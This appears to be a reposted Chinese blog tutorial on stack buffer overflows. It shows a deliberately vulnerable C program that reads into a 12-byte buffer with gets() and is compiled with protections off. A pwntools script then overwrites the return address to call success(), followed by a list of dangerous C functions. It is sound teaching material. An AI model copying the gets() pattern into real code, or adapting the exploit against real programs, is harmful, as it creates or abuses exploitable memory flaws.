百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

深入栈攻击系列(1) 栈的入栈操作

bigegpt 2024-09-25 14:33 3 浏览

函数调用约定(Linux)

需要注意的是,32 位和 64 位程序有以下简单的区别 x86 函数参数在函数返回地址的上方 x64 System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在栈上。 内存地址不能大于 0x00007FFFFFFFFFFF,6 个字节长度,否则会抛出异常。

堆栈溢出原理

栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是

  • 程序必须向栈上写入数据
  • 写入的数据大小没有被良好地控制。

基本示例

势力代码exit.c如下:

#include<stdio.h>#include <string.h>#include<stdlib.h>void success() { puts("You Hava already controlled it."); }void vulnerable(){    char s[12];    gets(s);    puts(s);    return;}int main(){    vulnerable();    return 0;}

这个程序的主要目的读取一个字符串,并将其输出。我们希望可以控制程序执行 success 函数。 通过gcc进行编译:

 gcc -m32 -ggdb -z execstack -fno-stack-protector  -no-pie -o pwnme exit.c

关闭pie、关闭栈保护(Canary),堆栈可执行(NX为开启)。通过checksec查看,如图:

使用radare2进行调试: 首先查看success的地址,如下所示为0x08048456,由于关闭了pie和ASLR,这个值是固定的。

对pwnme这个程序中进行逆向,查看vulnerable的汇编代码:

攻击思路

由于gets 本身是一个危险函数。它从不检查输入字符串的长度,而是以回车来判断输入是否结束,所以很容易可以导致栈溢出。而本次溢出攻击基于的就是gets函数。 通过radare2进行调试,在puts函数断点,输入'AAAAAAA',查看函数堆栈情况如下:

通过分析汇编代码和堆栈数据,可以得出如下所示的栈结构。

    High    Address |                 |            +-----------------+            | args            |            +-----------------+            | return address  |            +-----------------+         ebp | old ebp         |            +-----------------+            |   ...           |            +-----------------+      ebp-14| local variables |    Low     |                 |    Address

要执行success函数,我们可以直接将堆栈中返回地址(return address)的值设置为success的地址,然后,当vulnerable返回的时候,就会跳转到success函数的地址。

攻击代码

##coding=utf8from pwn import *## 构造与程序交互的对象sh = process('./pwnme')success_addr = 0x08048456## 构造payloadpayload = 'a' * 0x14 + 'bbbb' + p32(success_addr)print p32(success_addr)## 向程序发送字符串sh.sendline(payload)## 将代码交互转换为手工交互sh.interactive()

运行python代码,效果如图所示,我们成功地调用了success函数

小总结

上面的示例其实也展示了栈溢出中比较重要的几个步骤。

寻找危险函数

通过寻找危险函数,我们快速确定程序是否可能有栈溢出,以及有的话,栈溢出的位置在哪里。常见的危险函数如下

输入 gets,直接读取一行,忽略'\x00' scanf vscanf输出 sprintf字符串 strcpy,字符串复制,遇到'\x00'停止 strcat,字符串拼接,遇到'\x00'停止 bcopy

确定填充长度

这一部分主要是计算我们所要操作的地址与我们所要覆盖的地址的距离。常见的操作方法就是打开Radare2,根据其给定的地址计算偏移。一般变量会有以下几种索引模式

相对于栈基地址的的索引,可以直接通过查看 EBP 相对偏移获得相对应栈顶指针的索引,一般需要进行调试,之后还是会转换到第一种类型。直接地址索引,就相当于直接给定了地址。

一般来说,我们会有如下的覆盖需求

覆盖函数返回地址,这时候就是直接看 EBP 即可。覆盖栈上某个变量的内容,这时候就需要更加精细的计算了。覆盖 bss 段某个变量的内容。根据现实执行情况,覆盖特定的变量或地址的内容。

之所以我们想要覆盖某个地址,是因为我们想通过覆盖地址的方法来直接或者间接地控制程序执行流程。

公众号

更多安全相关内容,欢迎关注我的公众号:无情剑客。

相关推荐

C#.NET Autofac 详解(c# autoit)

简介Autofac是一个成熟的、功能丰富的.NET依赖注入(DI)容器。相比于内置容器,它额外提供:模块化注册、装饰器(Decorator)、拦截器(Interceptor)、强o的属性/方法注...

webapi 全流程(webapi怎么部署)

C#中的WebAPIMinimalApi没有控制器,普通api有控制器,MinimalApi是直达型,精简了很多中间代码,广泛适用于微服务架构MinimalApi一切都在组控制台应用程序类【Progr...

.NET外挂系列:3. 了解 harmony 中灵活的纯手工注入方式

一:背景1.讲故事上一篇我们讲到了注解特性,harmony在内部提供了20个HarmonyPatch重载方法尽可能的让大家满足业务开发,那时候我也说了,特性虽然简单粗暴,但只能解决95%...

C# 使用SemanticKernel调用本地大模型deepseek

一、先使用ollama部署好deepseek大模型。具体部署请看前面的头条使用ollama进行本地化部署deepseek大模型二、创建一个空的控制台dotnetnewconsole//添加依赖...

C#.NET 中间件详解(.net core中间件use和run)

简介中间件(Middleware)是ASP.NETCore的核心组件,用于处理HTTP请求和响应的管道机制。它是基于管道模型的轻量级、模块化设计,允许开发者在请求处理过程中插入自定义逻辑。...

IoC 自动注入:让依赖注册不再重复劳动

在ASP.NETCore中,IoC(控制反转)功能通过依赖注入(DI)实现。ASP.NETCore有一个内置的依赖注入容器,可以自动完成依赖注入。我们可以结合反射、特性或程序集扫描来实现自动...

C#.NET 依赖注入详解(c#依赖注入的三种方式)

简介在C#.NET中,依赖注入(DependencyInjection,简称DI)是一种设计模式,用于实现控制反转(InversionofControl,IoC),以降低代码耦合、提高可...

C#从零开始实现一个特性的自动注入功能

在现代软件开发中,依赖注入(DependencyInjection,DI)是实现松耦合、模块化和可测试代码的一个重要实践。C#提供了优秀的DI容器,如ASP.NETCore中自带的Micr...

C#.NET 仓储模式详解(c#仓库货物管理系统)

简介仓储模式(RepositoryPattern)是一种数据访问抽象模式,它在领域模型和数据访问层之间创建了一个隔离层,使得领域模型无需直接与数据访问逻辑交互。仓储模式的核心思想是将数据访问逻辑封装...

C#.NET 泛型详解(c# 泛型 滥用)

简介泛型(Generics)是指在类型或方法定义时使用类型参数,以实现类型安全、可重用和高性能的数据结构与算法为什么需要泛型类型安全防止“装箱/拆箱”带来的性能损耗,并在编译时检测类型错误。可重用同一...

数据分析-相关性分析(相关性 分析)

相关性分析是一种统计方法,用于衡量两个或多个变量之间的关系强度和方向。它通过计算相关系数来量化变量间的线性关系,从而帮助理解变量之间的相互影响。相关性分析常用于数据探索和假设检验,是数据分析和统计建模...

geom_smooth()函数-R语言ggplot2快速入门18

在每节,先运行以下这几行程序。library(ggplot2)library(ggpubr)library(ggtext)#用于个性化图表library(dplyr)#用于数据处理p...

规范申报易错要素解析(规范申报易错要素解析)

为什么要规范申报?规范申报是以满足海关监管、征税、统计等工作为目的,纳税义务人及其代理人依法向海关如实申报的行为,也是海关审接单环节依法监管的重要工作。企业申报的内容须符合《中华人民共和国海关进出口货...

「Eurora」海关编码归类 全球海关编码查询 关务服务

  海关编码是什么?  海关编码即HS编码,为编码协调制度的简称。  其全称为《商品名称及编码协调制度的国际公约》(InternationalConventionforHarmonizedCo...

9月1日起,河南省税务部门对豆制品加工业试行新政7类豆制品均适用投入产出法

全媒体记者杨晓川报道9月2日,记者从税务部门获悉,为减轻纳税人税收负担,完善农产品增值税进项税额抵扣机制,根据相关规定,结合我省实际情况,经广泛调查研究和征求意见,从9月1日起,我省税务部门对豆制品...